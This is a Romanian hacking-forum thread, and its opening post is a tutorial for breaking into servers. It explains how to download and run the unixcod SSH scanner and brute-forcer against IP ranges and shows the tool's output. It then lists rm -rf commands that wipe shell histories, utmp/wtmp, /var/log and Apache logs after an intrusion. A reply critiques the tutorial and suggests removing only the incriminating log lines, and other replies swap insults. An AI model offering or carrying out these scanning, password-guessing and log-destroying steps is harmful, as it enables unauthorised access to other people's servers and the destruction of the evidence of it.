Jump to content
sado

SSH scanner+bruteforce(linux only)

Recommended Posts

Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi:

De ce avem nevoie:

-1- bucata scanner ssh

-2- bucata brute force ssh

-3- 2 in 1

....

Avem nevoie de scannerul: unixcod

Descarcam scannerul:2shared - download unixcod.tar.gz

PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura.

Deschidem consola..

Folosim comanda de extragere:

sudo tar -zxvf <sursa fisier>

Fisierul este extras..acum frumos selectam din consola calea catre folder:

cd <sursa fisier>

Acum ca sa pornim scannerul , in folderul sursa , dam comanda:

./unix ip.ip

Unde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111.

EXEMPLU:


Start scan:

user@user-desktop:~/unixcod$ ./unix 70.70
[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]
[+] SSH Brute force scanner : user & password [+]
[+] Undernet Channel : #UnixCoD [+]
[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]
[+] Scanam: 70.70.4.* (total: 2) (1.6% done)

Scan finish:

[+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri]
[+] Incepe partea cea mai misto
[+] Doar 66 de servere. Exista un inceput pt. toate !
[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]
[+] Incepem sa vedem cate server putem sparge
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Scanner a terminat de scanat !


Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate:

Avem comenzile urmatoare

______________________________________________
| | +LOG REMOVE SHELL COMAND+ | |
|___|____________________________________|___|
| + | rm -rf unixcod | + |
| + | rm -rf /tmp/logs | + |
| + | rm -rf $HISTFILE | + |
| + | rm -rf /root/.ksh_history | + |
| + | rm -rf /root/.bash_history | + |
| + | rm -rf /root/.ksh_history | + |
| + | rm -rf /root/.bash_logout | + |
| + | rm -rf /usr/local/apache/logs | + |
| + | rm -rf /usr/local/apache/log | + |
| + | rm -rf /var/apache/logs | + |
| + | rm -rf /var/apache/log | + |
| + | rm -rf /var/run/utmp | + |
| + | rm -rf /var/logs | + |
| + | rm -rf /var/log | + |
| + | rm -rf /var/adm | + |
| + | rm -rf /etc/wtmp | + |
| + | rm -rf /etc/utmp | + |
| + | | + |
| + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + |
| + | | + |
|_+_|____________________________________|_+_|

Alte completari o sa aduc in masura intrebarilor postate.

  • Upvote 1
Link to comment
Share on other sites

Fun fact: ca la o melodie disco, cred ca unixcod are vreo 1337 "remixuri" :)), unele din ele, sau poate chiar marea majoritate trimit mail la cei care fac "remixurile" cu logurile de scanari...

Cauta despre ncrack, este mult mai eficient :)

Ncrack - High-speed network authentication cracker

Eu am scris asa ca sa invete cineve ceva..nu neaparat sa si puna in aplicare..era normal sa nu pun scannere/brute-force-uri puternice si eficiente...

oricum e bine de stiut ce ai scris tu.

Link to comment
Share on other sites

1. De unde ai copiat prostia asta?

2. Unixcod-ul e vechi rau

3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici

4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100%

5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16

Edited by Zatarra
  • Upvote 1
Link to comment
Share on other sites

1. De unde ai copiat prostia asta?

2. Unixcod-ul e vechi rau

3. Asa spusele comenzi de sters log-uri nu au nici o treaba cu ceea ce vorbesti tu aici

4. Sper sa nu mai postezi prostii asa mari iar daca o faci sa postezi macar ceva facut de tine in proportie de 100%

5. Primele 2 range-uri alea nu exista, exista doar o clasa de timp B cu un subnet mask de /16

Apreciez ce ai zis , tutorialul e facut de mine in proportie de 100%..eu l-am scris cu mana mea ...

oricum , mai am multe de invatat..

Link to comment
Share on other sites

Ok atunci hai sa iti explic unele chestii, poate inveti si tu ceva din ele:

1. Ai pus degeaba sudo in fata comenzii de dezarhivare. Atat timp cat descarci arhiva cu un user ea va fii creata cu permisiunile setate prin umask-ul userului respectiv. Astfel nu e nevoie sa mai dai sudo pentru dezarhivare.

2. O posibila problema ar putea fii permisiuniile fisierelor din arhiva, care sunt exact aceleasi cu cele din momentul arhivarii. Deci o comanda de chmod +x * ar rezolva problema

3. Acum sa iti explic cum sta treaba cu logurile:

a) degeaba stergi .bash_history deoarece tu vei sterge toata istoria comenzilor executate PANA in momentul in care te-ai logat tu pe server.

B) degeaba stergi .ksh_history si .csh_history deoarece tu nu vei folosi nici Korn shell nici C shell.

c) degeaba stergi .bash_logout deoarece nici un server nu face script in fisierul de logout.

d) sa nu mai spun ca multe din locatiile care le stergi tu cu comenzile respective nu exista.

e) singura cheste relativ folositoare e sa stergi access_log-ul cum spui tu, in cazul in care intri pe interfata web, dar nici asta nu e indicata deoarece e o metoda foarte clara ca cineva a fost pe server, asadar o alternativa ar fii sa stergi doar rand-urile care dovedesc ca tu ai trecut p'acolo.

4. Ma bucur ca nu ai inceput sa injuri sau alte chestii de genul

5. Bafta si alta data mai cere si tu ajutorul in stanga si in dreapta cand vrei sa faci un tutorial si nu esti sigur pe el

  • Like 1
Link to comment
Share on other sites

Toti cauta sa sparga rooturi sau alte servici de care pot profita in mediul online..Un exemplu de "munca" ar fi:

De ce avem nevoie:

-1- bucata scanner ssh

-2- bucata brute force ssh

-3- 2 in 1

....

Avem nevoie de scannerul: unixcod

Descarcam scannerul:2shared - download unixcod.tar.gz

PS : tool-ul folosit este unul destul de comod care se descurca destul de bine , dar totusi , daca vrei sa furi ceva bun ai nevoie de ceva pe masura.

Deschidem consola..

Folosim comanda de extragere:

sudo tar -zxvf <sursa fisier>

Fisierul este extras..acum frumos selectam din consola calea catre folder:

cd <sursa fisier>

Acum ca sa pornim scannerul , in folderul sursa , dam comanda:

./unix ip.ip

Unde ip sunt primele 2 rangeuri dintr-un ip , de exemplu din ip-ul 100.111.122.133 luam doar 100.111.

EXEMPLU:


Start scan:

user@user-desktop:~/unixcod$ ./unix 70.70
[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]
[+] SSH Brute force scanner : user & password [+]
[+] Undernet Channel : #UnixCoD [+]
[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]
[+] Scanam: 70.70.4.* (total: 2) (1.6% done)

Scan finish:

[+] Find ip a terminat in 530 de secunde. [Am gasit 66 ip`uri]
[+] Incepe partea cea mai misto
[+] Doar 66 de servere. Exista un inceput pt. toate !
[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]
[+] Incepem sa vedem cate server putem sparge
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]
[+] UnixCoD Scanner a terminat de scanat !


Cand acceseri un root/server web e bine sa iti stergi logurile , in masura permisiunilor furate:

Avem comenzile urmatoare

______________________________________________
| | +LOG REMOVE SHELL COMAND+ | |
|___|____________________________________|___|
| + | rm -rf unixcod | + |
| + | rm -rf /tmp/logs | + |
| + | rm -rf $HISTFILE | + |
| + | rm -rf /root/.ksh_history | + |
| + | rm -rf /root/.bash_history | + |
| + | rm -rf /root/.ksh_history | + |
| + | rm -rf /root/.bash_logout | + |
| + | rm -rf /usr/local/apache/logs | + |
| + | rm -rf /usr/local/apache/log | + |
| + | rm -rf /var/apache/logs | + |
| + | rm -rf /var/apache/log | + |
| + | rm -rf /var/run/utmp | + |
| + | rm -rf /var/logs | + |
| + | rm -rf /var/log | + |
| + | rm -rf /var/adm | + |
| + | rm -rf /etc/wtmp | + |
| + | rm -rf /etc/utmp | + |
| + | | + |
| + |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| + |
| + | | + |
|_+_|____________________________________|_+_|

Alte completari o sa aduc in masura intrebarilor postate.

partea proasta e ca linkul nu mai e valabil mie imi da eroare cand incerc sa il iau

2shared - download unixcod.tar.gz

Link to comment
Share on other sites

Cunosc faptul ca este relativ vechi acest topic, dar doresc sa stiu si eu care ar fii motivele pentru care imi apare urmatoarea erroare :


[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.
[+] Unable to allocate socket.^C

L.E. : Am rezolvat dupa cateva minute mi-am dat seama imediat,scuza-ti faptul ca am postat tocmai acum . :)

Edited by Wazza91
Link to comment
Share on other sites

Sa-mi bag pula, sunteti complet retarzi. Redeschideti topicul pentru intrebari idioate.

Gosh asta al vostru nu e cu nimic diferit de orice alt bruteforce. Pass_file-ul difera. Beliti in pula mea ochii la ce fisiere aveti acolo in folderul vietii si veti vedea ca sunt unele care se repeta in majoritatea scannerelor pentru idioti. Hackerilor.

Link to comment
Share on other sites

Ba tu esti prost? Gosh-ul e un cacat de scanner, care are vreo 5-6 pass_file-uri pe care le ia la rand cand face bruteforce cu acelasi 'ssh-scan' pe care-l au toate scannerele. Unixcod-ul avea alt script pt brutforce, dar pe aceiasi idee.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...